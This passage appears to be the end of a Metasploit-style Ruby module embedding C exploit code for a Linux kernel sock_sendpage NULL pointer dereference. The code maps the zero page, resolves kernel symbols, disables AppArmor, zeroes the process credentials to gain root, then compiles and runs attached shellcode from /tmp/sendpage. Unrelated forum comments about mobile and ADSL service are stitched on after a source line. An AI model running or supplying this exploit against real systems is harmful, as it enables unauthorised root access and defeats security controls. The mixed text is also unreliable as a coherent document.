              printf("Unable to obtain symbol listing!\n");
              return 0;
            }
          }

          ret = 0;
          while(ret != EOF) {
            ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
            if (ret == 0) {
              fscanf(f, "%s\n", sname);
              continue;
            }
            if (!strcmp(name, sname)) {
              printf(" [+] Resolved %s to %p\n", name, (void *)addr);
              fclose(f);
              return addr;
            }
          }

          fclose(f);
          return 0;
        }

        /* Scan the current task_struct for our uid/gid run and zero it (root) */
        static void change_cred(void)
        {
          unsigned int *task_struct;

          task_struct = (unsigned int *)current_task_struct();
          while (task_struct) {
            if (task_struct[0] == uid && task_struct[1] == uid &&
                task_struct[2] == uid && task_struct[3] == uid &&
                task_struct[4] == gid && task_struct[5] == gid &&
                task_struct[6] == gid && task_struct[7] == gid) {
              task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] =
              task_struct[4] = task_struct[5] = task_struct[6] = task_struct[7] = 0;
              break;
            }
            task_struct++;
          }
          return;
        }

        /* Runs in ring 0 when the kernel calls through the NULL sendpage pointer */
        int __attribute__((regparm(3)))
        own_the_kernel(unsigned long a, unsigned long b, unsigned long c, unsigned long d, unsigned long e)
        {
          got_ring0 = 1;
          if (apparmor_enabled && *apparmor_enabled) {
            *apparmor_enabled = 0;
          }
          change_cred();
          return -1;
        }

        const char *shellcode = "";
        int shellcode_size = 0;

        int main()
        {
          int i = 0;
          int d;
          int in_fd, out_fd;
          char *mapped;
          char template[] = "/tmp/sendfile.XXXXXX";
          int (*func)();

          uid = getuid(), gid = getgid();

          /* Map the zero page so the NULL function pointer lands on our trampoline */
          mapped = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC,
                        MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
          if (mapped == NULL) {
            printf("Mapped zero page!\n");
          } else {
            exit(1);
          }

          // jmp dword near [dword 0x8]
          mapped[0] = '\xff';
          mapped[1] = '\x25';
          *(unsigned long *)&mapped[2] = 8;
          *(unsigned long *)&mapped[8] = (unsigned long)own_the_kernel;

          for (i = 0; i < 16; i++) {
            printf("\\\\x%02x", (unsigned char)mapped[i]);
          }
          printf("\n");

          for (d = 0; domains[d] != DOMAINS_STOP; d++) {
            //printf("Next domain ... ");
            out_fd = socket(domains[d], SOCK_DGRAM, 0);
            if (out_fd > 0) {
              printf("Got domain[%d]\n", d);
              break;
            }
            if (out_fd < 0) {
              printf("out_fd: %d, Errno: %d\n", out_fd, errno);
              exit(1);
            }
          }

          unlink(template);
          // Couldn't get mkstemp to work, just use open(2) for now
          in_fd = open(template, O_CREAT | O_RDWR, 0777);
          printf("Opened temp file: %d\n", in_fd);
          unlink(template);

          printf("Calling ftruncate\n");
          ftruncate(in_fd, 4096);

          printf("got_ring0 addr: " PTR_FMT "\n", &got_ring0);
          printf("Calling sendfile(%d, %d, %d, %d)\n", out_fd, in_fd, NULL, 4096);
          /* sendfile() on the socket reaches sock_sendpage(), which calls the NULL pointer */
          sendfile(out_fd, in_fd, NULL, 4096);
          printf("got_ring0: " PTR_FMT ", %d\n", &got_ring0, got_ring0);
          printf("UID: %d GID: %d\n", getuid(), getgid());

          func = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
          mprotect(func, 4096, PROT_READ|PROT_WRITE|PROT_EXEC);
          // weaksauce memcpy so we don't have to #include <string.h>
          printf("Copying %d bytes of shellcode\n", shellcode_size);
          for (i = 0; i < shellcode_size; i++) {
            (char)func[i] = (char)shellcode[i];
          }
          printf("Calling shellcode: 0x%p\n", func);
          //sigtrap();
          func();

          return got_ring0;
        }
      ^

      main.gsub!(/shellcode =/) do
        # split the payload into 16-byte chunks and dump it out as a
        # hex-escaped C string
        %Q|shellcode =\n"#{payload.encoded.scan(/.{,16}/).map{|c|Rex::Text.to_hex(c,"\\x")}.join(%Q|"\n"|)}"|
      end
      main.gsub!(/shellcode_size = 0/, "shellcode_size = #{payload.encoded.length}")

      cparser.parse(main, "main.c")
      asm = cpu.new_ccompiler(cparser, sc).compile
      sc.parse asm
    end

    sc.assemble

    begin
      if sc.kind_of? Metasm::ELF
        elf = sc.encode_string
      else
        foo = sc.encode_string
        elf = Msf::Util::EXE.to_linux_x86_elf(framework, foo)
      end
    rescue
      print_error "Metasm Encoding failed: #{$!}"
      elog "Metasm Encoding failed: #{$!.class} : #{$!}"
      elog "Call stack:\n#{$!.backtrace.join("\n")}"
      return
    end

    #puts Rex::Text.to_hex_dump(foo)
    File.open("payload.bin", "wb") {|fd| fd.write elf }

    print_status "Writing exploit executable (#{elf.length} bytes)"
    cmd_exec("rm /tmp/sendpage")
    write_file("/tmp/sendpage", elf)
    output = cmd_exec("chmod +x /tmp/sendpage; /tmp/sendpage")
    output.each_line { |line|
      print_debug line.chomp
    }
    #cmd_exec("rm /tmp/sendpage")
  end
end
```

     source: bugsearch.net
  23. Since it works on Cosmote prepaid it should work on broscoi too
  24. It depends on the area, on the technology used in that area, on the skill/haste/laziness of whoever did your hookup, on the server and many other things. In principle it's fairly stable. In my area, when there weren't many subscribers, it went down once every 2 years. Now it goes down more often. @Gecko it's not dialup, it's ADSL or fibre
  25. Like a dead man's eyes for a few days now. Otherwise OK